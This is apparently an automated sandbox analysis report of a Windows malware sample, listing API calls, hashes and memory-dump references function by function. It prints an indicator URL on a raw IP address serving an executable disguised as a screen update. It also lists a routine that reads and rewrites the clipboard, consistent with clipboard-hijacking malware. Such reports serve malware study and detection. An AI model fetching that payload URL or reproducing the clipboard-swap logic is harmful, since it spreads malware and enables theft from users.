  • Snapshot File: hcaresult_0_2_400000_XIaCqh1vRm.jbxd
Similarity
  • API ID: _wcslen$Sleep
  • String ID: http://176.113.115.19/ScreenUpdateSync.exe
                                                                                                                                                                                                                                                                          • API String ID: 3358372957-3120454669
                                                                                                                                                                                                                                                                          • Opcode ID: ec5b8e6b587f5ffe173a4fe2956bfbb53381ca1a870b5d286590f738381d6d8e
                                                                                                                                                                                                                                                                          • Instruction ID: 033e26d6726dec48d9da5d172e0a3ce7e355aee553d479aaec466036f4edd3d7
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ec5b8e6b587f5ffe173a4fe2956bfbb53381ca1a870b5d286590f738381d6d8e
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 83319A15A6538094E330CFA0BC95A662330FF64B52F50653BD60CCB2B2E7A18587C35E
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • _wcslen.LIBCMT ref: 0040298F
                                                                                                                                                                                                                                                                          • __fassign.LIBCMT ref: 0040299F
                                                                                                                                                                                                                                                                            • Part of subcall function 00402823: std::ios_base::_Ios_base_dtor.LIBCPMT ref: 00402906
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.3743015579.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_XIaCqh1vRm.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Ios_base_dtor__fassign_wcslenstd::ios_base::_
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 2843524283-0
                                                                                                                                                                                                                                                                          • Opcode ID: 99f78a7314c7ad5a03a0c5f770c80a671dc835224e362237c5e255d3e1775ea8
                                                                                                                                                                                                                                                                          • Instruction ID: f5c656a3c742482aaca5e7be5327d781ae1f97b048d34cfcbeac2439ecd5e81b
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 99f78a7314c7ad5a03a0c5f770c80a671dc835224e362237c5e255d3e1775ea8
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C901D6B1E0021C5ADB25FA25EC46BEE77689B41304F0041BFA605E31C1E9B85E85CAD8
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • SetErrorMode.KERNEL32(00000400,?,?,02490223,?,?), ref: 02490E19
                                                                                                                                                                                                                                                                          • SetErrorMode.KERNEL32(00000000,?,?,02490223,?,?), ref: 02490E1E
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.3746353673.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2490000_XIaCqh1vRm.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: ErrorMode
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 2340568224-0
                                                                                                                                                                                                                                                                          • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                                                                                                                                                                                                                          • Instruction ID: 222b95ba1efed397dc51e845e48fe434b558f4b478ecd050a5280b6dec76a593
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 20D0123514512877DB002A94DC09BCE7F1CDF05B66F008011FB0DD9180C770954046E5
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.3743015579.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_XIaCqh1vRm.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: 77dff8414438c132d9b1b222249ac9577754d763359ce41167806e2a442978e4
                                                                                                                                                                                                                                                                          • Instruction ID: 5858c2b1917228bc3ee007884971bc5cb621fb913b3acd2bc442863518e7715d
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 77dff8414438c132d9b1b222249ac9577754d763359ce41167806e2a442978e4
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4051D531A00218AFDB10DF59C840BEA7BA1EFC9364F19919AF818AB391C779FD42C754
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.3743015579.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_XIaCqh1vRm.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: __fread_nolock
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 2638373210-0
                                                                                                                                                                                                                                                                          • Opcode ID: 330fcc4d7d5ac5b0b2ca1a235d838fa7146c9714e98705db01c69e2caad3ca42
                                                                                                                                                                                                                                                                          • Instruction ID: e1021867f2ec77c7d2f8cf192b2e918c2079a777806a714b314ab491ad94b1c1
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 330fcc4d7d5ac5b0b2ca1a235d838fa7146c9714e98705db01c69e2caad3ca42
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5831ADB1604312AFC710DF2AC88092ABFA9BF84351F04893EFD4497390D739DA548B8A
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 00402906
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.3743015579.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_XIaCqh1vRm.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Ios_base_dtorstd::ios_base::_
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 323602529-0
                                                                                                                                                                                                                                                                          • Opcode ID: 9e105bc645d13b5be37bf51f85b07603bbf9c4582c9b25cdf04d4c3893a06c3e
                                                                                                                                                                                                                                                                          • Instruction ID: a0c314b69e82cee7068a10c27dc1ba61f54dd3d6c342bb4161a68c9c894be626
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9e105bc645d13b5be37bf51f85b07603bbf9c4582c9b25cdf04d4c3893a06c3e
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B03118B4D002199BDB14EFA5D881AEDBBB4BF08304F5085AEE415B3281DB786A49CF54
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.3743015579.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_XIaCqh1vRm.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: H_prolog3_catch
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 3886170330-0
                                                                                                                                                                                                                                                                          • Opcode ID: 28d5133743d5d263c03eb5789c04d0db7473107e9a476edf8ad5427a5007d233
                                                                                                                                                                                                                                                                          • Instruction ID: b71381d5bc9e259bdf0532d7d2dd1dfab3929909e68e206b89482bd8707b5f49
• Opcode Fuzzy Hash: 28d5133743d5d263c03eb5789c04d0db7473107e9a476edf8ad5427a5007d233
• Instruction Fuzzy Hash: 9F215E70600205DFCB11DF55C580EADBBB5BF48704F14C06EE815AB3A2C778AE50CB94
APIs
Memory Dump Source
• Source File: 00000000.00000002.3743015579.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_XIaCqh1vRm.jbxd
Similarity
• API ID: __wsopen_s
• String ID:
• API String ID: 3347428461-0
• Opcode ID: ebde34e331f36d73ae22f6b7be2bf13c9f524ff7c3251c4fe3554b52cc0156cf
• Instruction ID: ced19a79aea4b3e33dd998471e9e3f3b23a78e9704dbb7c6d54aa915c2495f90
• Opcode Fuzzy Hash: ebde34e331f36d73ae22f6b7be2bf13c9f524ff7c3251c4fe3554b52cc0156cf
• Instruction Fuzzy Hash: 3911187590420AAFCF05DF58E94199B7BF4FF4C314F10406AF819AB311D671EA25CBA9
APIs
Memory Dump Source
• Source File: 00000000.00000002.3743015579.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_XIaCqh1vRm.jbxd
Similarity
• API ID: _free
• String ID:
• API String ID: 269201875-0
• Opcode ID: dcff01ba0718bc25fbadba801be0e76f759b5211c2d86b2f90a3e61a906836b7
• Instruction ID: e101c5f3f91c4e465480e224300ffd561ec2350ede5005b950df212ed8b6fbff
• Opcode Fuzzy Hash: dcff01ba0718bc25fbadba801be0e76f759b5211c2d86b2f90a3e61a906836b7
• Instruction Fuzzy Hash: B6F0BE33910008FBCF159E96DC01DDF3B6EEF8D338F100116F91492150DA3ACA21ABA4
APIs
• RtlAllocateHeap.NTDLL(00000000,0040D870,00000000,?,0042679E,00000002,00000000,00000000,00000000,?,0040CD21,0040D870,00000004,00000000,00000000,00000000), ref: 004336D9
Memory Dump Source
• Source File: 00000000.00000002.3743015579.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_XIaCqh1vRm.jbxd
Similarity
• API ID: AllocateHeap
• String ID:
• API String ID: 1279760036-0
• Opcode ID: 94f750592cee1f743f5fc95d96a6c8fbd485f7a37a0c4c452716bcfbad1791b8
• Instruction ID: 0777d31d9fa185a8b849a759fdbdb2b75b345829f9b614c7a8fa7ff1ccc7c9d0
• Opcode Fuzzy Hash: 94f750592cee1f743f5fc95d96a6c8fbd485f7a37a0c4c452716bcfbad1791b8
• Instruction Fuzzy Hash: AAE0E5313002207FD6303E675D07B5B36489F497A6F042127EC05A23D0DA6DEE0085AD
APIs
• __CxxThrowException@8.LIBVCRUNTIME ref: 004103C7
Memory Dump Source
• Source File: 00000000.00000002.3743015579.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_XIaCqh1vRm.jbxd
Similarity
• API ID: Exception@8Throw
• String ID:
• API String ID: 2005118841-0
• Opcode ID: 0f8767ceb07e994d1f5b8eaac8dd392143d78e3b1b871650e8a1b44da905b8b1
• Instruction ID: a93cbdcc7b8cec239d3e65b0583cf012edeaa99edf8fc6fd77b2b60b17382ec4
• Opcode Fuzzy Hash: 0f8767ceb07e994d1f5b8eaac8dd392143d78e3b1b871650e8a1b44da905b8b1
• Instruction Fuzzy Hash: 58E09B3450430E76CB1476A5FC1595D376C6A00354B904237BC28654D1DF78F59D858D
APIs
• CreateFileW.KERNEL32(00000000,00000000,?,0043D0E5,?,?,00000000,?,0043D0E5,00000000,0000000C), ref: 0043CD27
Memory Dump Source
• Source File: 00000000.00000002.3743015579.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_XIaCqh1vRm.jbxd
Similarity
• API ID: CreateFile
• String ID:
• API String ID: 823142352-0
• Opcode ID: c1825962b9e2d68b99604ae1ec91ea351fd51148a2f332f138c69e8dc7c90181
• Instruction ID: f5cec35e3468c2ebfedbe18043dc9de9c020ce50a8bef62643be49baa2ffa0a5
• Opcode Fuzzy Hash: c1825962b9e2d68b99604ae1ec91ea351fd51148a2f332f138c69e8dc7c90181
• Instruction Fuzzy Hash: DCD06C3200014DBBDF028F84DC06EDA3BAAFB48714F014150BA1856020C732E921AB95
APIs
• VirtualAlloc.KERNEL32(00000000,?,00001000,00000040), ref: 00A0A19E
Memory Dump Source
• Source File: 00000000.00000002.3744559508.0000000000A09000.00000040.00000020.00020000.00000000.sdmp, Offset: 00A09000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_a09000_XIaCqh1vRm.jbxd
Yara matches
Similarity
• API ID: AllocVirtual
• String ID:
• API String ID: 4275171209-0
• Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
• Instruction ID: f219fefe2dcc8f850f9e0a5d7c118e657287ea84b365b2a60dcec29fb858eee3
• Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
• Instruction Fuzzy Hash: F6113C79A00208EFDB01DF98CA85E98BBF5AF08350F058094F9489B362D371EA50EF81
APIs
• __EH_prolog3_GS.LIBCMT ref: 0249194D
• Sleep.KERNEL32(00001541), ref: 02491957
  • Part of subcall function 0249CE77: _strlen.LIBCMT ref: 0249CE8E
• OpenClipboard.USER32(00000000), ref: 02491984
• GetClipboardData.USER32(00000001), ref: 02491994
• _strlen.LIBCMT ref: 024919B0
• _strlen.LIBCMT ref: 024919DF
• _strlen.LIBCMT ref: 02491B23
• EmptyClipboard.USER32 ref: 02491B39
• GlobalAlloc.KERNEL32(00000002,00000001), ref: 02491B46
• GlobalUnlock.KERNEL32(00000000), ref: 02491B70
• SetClipboardData.USER32(00000001,00000000), ref: 02491B79
• GlobalFree.KERNEL32(00000000), ref: 02491B80
• CloseClipboard.USER32 ref: 02491BA4
• Sleep.KERNEL32(000002D2), ref: 02491BAF
Strings
Memory Dump Source
• Source File: 00000000.00000002.3746353673.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2490000_XIaCqh1vRm.jbxd
Yara matches
Similarity
• API ID: Clipboard$_strlen$Global$DataSleep$AllocCloseEmptyFreeH_prolog3_OpenUnlock
• String ID: 4#E$i
• API String ID: 4246938166-2480119546
• Opcode ID: 45a8dad81ff59b0f4b4464c7594e59c36273e081b3ff668940b9dbd8c87fe3c1
• Instruction ID: 63606adb81ef75338f9e99fff924674b777f75d393eb677b34fe5072a0c14ace
• Opcode Fuzzy Hash: 45a8dad81ff59b0f4b4464c7594e59c36273e081b3ff668940b9dbd8c87fe3c1
• Instruction Fuzzy Hash: 47512630C00395DADB11DFA4ED55BED7B74FF2A306F04522AD809A2172EB709681CB69
APIs
                                                                                                                                                                                                                                                                          • NtdllDefWindowProc_W.NTDLL(?,00000014,?,?), ref: 0249239C
                                                                                                                                                                                                                                                                          • GetClientRect.USER32(?,?), ref: 024923B1
                                                                                                                                                                                                                                                                          • GetDC.USER32(?), ref: 024923B8
                                                                                                                                                                                                                                                                          • CreateSolidBrush.GDI32(00646464), ref: 024923CB
                                                                                                                                                                                                                                                                          • CreatePen.GDI32(00000001,00000001,00FFFFFF), ref: 024923EA
                                                                                                                                                                                                                                                                          • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 0249240B
                                                                                                                                                                                                                                                                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 02492416
                                                                                                                                                                                                                                                                          • MulDiv.KERNEL32(00000008,00000000), ref: 0249241F
                                                                                                                                                                                                                                                                          • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000190,00000000,00000000,00000000,00000000,00000000,00000000,00000002,00000031,00451F10), ref: 02492443
                                                                                                                                                                                                                                                                          • SetBkMode.GDI32(?,00000001), ref: 024924CE
                                                                                                                                                                                                                                                                          • _wcslen.LIBCMT ref: 024924E6
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.3746353673.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2490000_XIaCqh1vRm.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Create$BrushCapsClientDeviceFontModeNtdllProc_RectRectangleSolidWindow_wcslen
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 1529870607-0
                                                                                                                                                                                                                                                                          • Opcode ID: b907d1a1b1e1ec1e10588b01c324950f76be5009d0317e1f7e1d34b68f08428a
                                                                                                                                                                                                                                                                          • Instruction ID: ddf4940b38fe77233b829d96e5e93ea08edf75a94bad4dbe5da1f3de282c151b
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b907d1a1b1e1ec1e10588b01c324950f76be5009d0317e1f7e1d34b68f08428a
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2171FC72900228AFDB229F64DD85FAEBBBCEF09711F0041A5B509E6151DA70AF85CF20
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.3743015579.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_XIaCqh1vRm.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: __floor_pentium4
                                                                                                                                                                                                                                                                          • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                                                                                                                                                                                                                          • API String ID: 4168288129-2761157908
                                                                                                                                                                                                                                                                          • Opcode ID: 1705c8ec1ca245728102af4e988fb3fc25a52218aafbc3cd1121bd07fbf397af
                                                                                                                                                                                                                                                                          • Instruction ID: 9e6dbbf50b3e3cea2dd72b1fc58d7ba5eae27dc46f9bc3f4d00a4e89d85e9552
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1705c8ec1ca245728102af4e988fb3fc25a52218aafbc3cd1121bd07fbf397af
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 96C25B71E096288FDB25CE29DD407EAB7B5EB48304F1551EBD80DE7280E778AE818F45
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • GetLocaleInfoW.KERNEL32(FDE8FE81,2000000B,00000000,00000002,00000000,?,?,?,0043BA8D,?,00000000), ref: 0043B807
                                                                                                                                                                                                                                                                          • GetLocaleInfoW.KERNEL32(FDE8FE81,20001004,00000000,00000002,00000000,?,?,?,0043BA8D,?,00000000), ref: 0043B830
                                                                                                                                                                                                                                                                          • GetACP.KERNEL32(?,?,0043BA8D,?,00000000), ref: 0043B845
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.3743015579.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_XIaCqh1vRm.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: InfoLocale
                                                                                                                                                                                                                                                                          • String ID: ACP$OCP
                                                                                                                                                                                                                                                                          • API String ID: 2299586839-711371036
                                                                                                                                                                                                                                                                          • Opcode ID: 21f00b6a3c247b9fce04692a0f5e8342b2d0b582c69aad3f893cd06e155ac896
                                                                                                                                                                                                                                                                          • Instruction ID: fa2a6f3f06b8257a5ac591d998b536fc1da73be0d13f1331aa64b533421ee897
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 21f00b6a3c247b9fce04692a0f5e8342b2d0b582c69aad3f893cd06e155ac896
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4B21A136A00104AAD738DF14C801B9777AAEF98F50F669466EB0AD7311E736DE41C7D8
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • GetLocaleInfoW.KERNEL32(FDE8FE81,2000000B,00000000,00000002,00000000,?,?,?,024CBCF4,?,00000000), ref: 024CBA6E
                                                                                                                                                                                                                                                                          • GetLocaleInfoW.KERNEL32(FDE8FE81,20001004,00000000,00000002,00000000,?,?,?,024CBCF4,?,00000000), ref: 024CBA97
                                                                                                                                                                                                                                                                          • GetACP.KERNEL32(?,?,024CBCF4,?,00000000), ref: 024CBAAC
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.3746353673.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2490000_XIaCqh1vRm.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: InfoLocale
                                                                                                                                                                                                                                                                          • String ID: ACP$OCP
                                                                                                                                                                                                                                                                          • API String ID: 2299586839-711371036
                                                                                                                                                                                                                                                                          • Opcode ID: 21f00b6a3c247b9fce04692a0f5e8342b2d0b582c69aad3f893cd06e155ac896
                                                                                                                                                                                                                                                                          • Instruction ID: fe700fbc09080462cc1489e1ccd3d969674786d001abbddece9df515dcfa908c
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 21f00b6a3c247b9fce04692a0f5e8342b2d0b582c69aad3f893cd06e155ac896
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9F21773A600105AAD7748F5DD902BA777A6EB44E5CB66806EE989D7310F733DE81C350
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                            • Part of subcall function 00431EDA: GetLastError.KERNEL32(?,?,0042DFE5,00457910,00000010), ref: 00431EDE
                                                                                                                                                                                                                                                                            • Part of subcall function 00431EDA: _free.LIBCMT ref: 00431F11
                                                                                                                                                                                                                                                                            • Part of subcall function 00431EDA: SetLastError.KERNEL32(00000000), ref: 00431F52
                                                                                                                                                                                                                                                                            • Part of subcall function 00431EDA: _free.LIBCMT ref: 00431F39
                                                                                                                                                                                                                                                                            • Part of subcall function 00431EDA: SetLastError.KERNEL32(00000000), ref: 00431F46
                                                                                                                                                                                                                                                                          • GetUserDefaultLCID.KERNEL32(?,?,?), ref: 0043BA4E
                                                                                                                                                                                                                                                                          • IsValidCodePage.KERNEL32(00000000), ref: 0043BAA9
                                                                                                                                                                                                                                                                          • IsValidLocale.KERNEL32(?,00000001), ref: 0043BAB8
                                                                                                                                                                                                                                                                          • GetLocaleInfoW.KERNEL32(?,00001001,004307B5,00000040,?,004308D5,00000055,00000000,?,?,00000055,00000000), ref: 0043BB00
                                                                                                                                                                                                                                                                          • GetLocaleInfoW.KERNEL32(?,00001002,00430835,00000040), ref: 0043BB1F
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.3743015579.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_XIaCqh1vRm.jbxd
Similarity
• API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser
• String ID:
• API String ID: 2287132625-0
• Opcode ID: 09e7077a585d70c8480d4b1d78da616f19cbc20ae15e0cb08ae98176a4c780fb
• Instruction ID: d022b458b050368e3858f313ea430915e0084ddf9245bc07a5b1b9775f8f1cbc
• Opcode Fuzzy Hash: 09e7077a585d70c8480d4b1d78da616f19cbc20ae15e0cb08ae98176a4c780fb
• Instruction Fuzzy Hash: E1516171A006059BEB10EFA5CC45BBF73B8FF4C701F14556BEA14E7290E7789A048BA9
APIs
  • Part of subcall function 024C2141: GetLastError.KERNEL32(?,?,024BA9EC,?,00000000,?,024BCDE6,0249247E,00000000,?,00451F20), ref: 024C2145
  • Part of subcall function 024C2141: _free.LIBCMT ref: 024C2178
  • Part of subcall function 024C2141: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 024C21B9
  • Part of subcall function 024C2141: _free.LIBCMT ref: 024C21A0
  • Part of subcall function 024C2141: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 024C21AD
• GetUserDefaultLCID.KERNEL32(?,?,?), ref: 024CBCB5
• IsValidCodePage.KERNEL32(00000000), ref: 024CBD10
• IsValidLocale.KERNEL32(?,00000001), ref: 024CBD1F
• GetLocaleInfoW.KERNEL32(?,00001001,024C0A1C,00000040,?,024C0B3C,00000055,00000000,?,?,00000055,00000000), ref: 024CBD67
• GetLocaleInfoW.KERNEL32(?,00001002,024C0A9C,00000040), ref: 024CBD86
Memory Dump Source
• Source File: 00000000.00000002.3746353673.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2490000_XIaCqh1vRm.jbxd
Yara matches
Similarity
• API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser
• String ID:
• API String ID: 2287132625-0
• Opcode ID: 119725e359bc42e0bfb9cdb5970e3de8a9f9b5c3b1583b7d82a4707c3220fec3
• Instruction ID: 0234186ece980b335b2201505978ecfd96848d35706020ce265d594a3b812761
• Opcode Fuzzy Hash: 119725e359bc42e0bfb9cdb5970e3de8a9f9b5c3b1583b7d82a4707c3220fec3
• Instruction Fuzzy Hash: F15193799002099BEB51DFA9DC42ABF77B9FF14708F24042FE901E7290EB719A41CB61
Strings
Memory Dump Source
• Source File: 00000000.00000002.3743015579.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_XIaCqh1vRm.jbxd
Similarity
• API ID:
• String ID: C$C
• API String ID: 0-238425240
• Opcode ID: 185f0ef558908b44b9225c7828f32a07078ec648b0e05d0c62af8d2f3fb84e81
• Instruction ID: c20898a9e1ba257a9a920a277c678998c6649ecb9dd7e2fb432374692491c933
• Opcode Fuzzy Hash: 185f0ef558908b44b9225c7828f32a07078ec648b0e05d0c62af8d2f3fb84e81
• Instruction Fuzzy Hash: D2025C71E002299BDF14CFAAD9806AEBBF1EF88314F65416AD919E7380D734A9418B94
APIs
  • Part of subcall function 00431EDA: GetLastError.KERNEL32(?,?,0042DFE5,00457910,00000010), ref: 00431EDE
  • Part of subcall function 00431EDA: _free.LIBCMT ref: 00431F11
  • Part of subcall function 00431EDA: SetLastError.KERNEL32(00000000), ref: 00431F52
• IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,004307BC,?,?,?,?,00430213,?,00000004), ref: 0043B0EC
• _wcschr.LIBVCRUNTIME ref: 0043B17C
• _wcschr.LIBVCRUNTIME ref: 0043B18A
• GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,004307BC,00000000,004308DC), ref: 0043B22D
Memory Dump Source
• Source File: 00000000.00000002.3743015579.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_XIaCqh1vRm.jbxd
Similarity
• API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_free
• String ID:
• API String ID: 2444527052-0
• Opcode ID: 0931e6da1e5e69565e8d8cf9fe0bd78167b9118aed70e948f35c6624fe6e05f7
• Instruction ID: 51baba79e9d53baeee2bb674299bb26a4ab80324ce8bdae5682f18c88f981068
• Opcode Fuzzy Hash: 0931e6da1e5e69565e8d8cf9fe0bd78167b9118aed70e948f35c6624fe6e05f7
• Instruction Fuzzy Hash: 2A611871600305AADB25AB35DC46FAB73A8EF0C754F14142FFA15D7281EB78E90087E9
APIs
  • Part of subcall function 024C2141: GetLastError.KERNEL32(?,?,024BA9EC,?,00000000,?,024BCDE6,0249247E,00000000,?,00451F20), ref: 024C2145
  • Part of subcall function 024C2141: _free.LIBCMT ref: 024C2178
  • Part of subcall function 024C2141: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 024C21B9
• IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,024C0A23,?,?,?,?,024C047A,?,00000004), ref: 024CB353
• _wcschr.LIBVCRUNTIME ref: 024CB3E3
• _wcschr.LIBVCRUNTIME ref: 024CB3F1
• GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,024C0A23,00000000,024C0B43), ref: 024CB494
Memory Dump Source
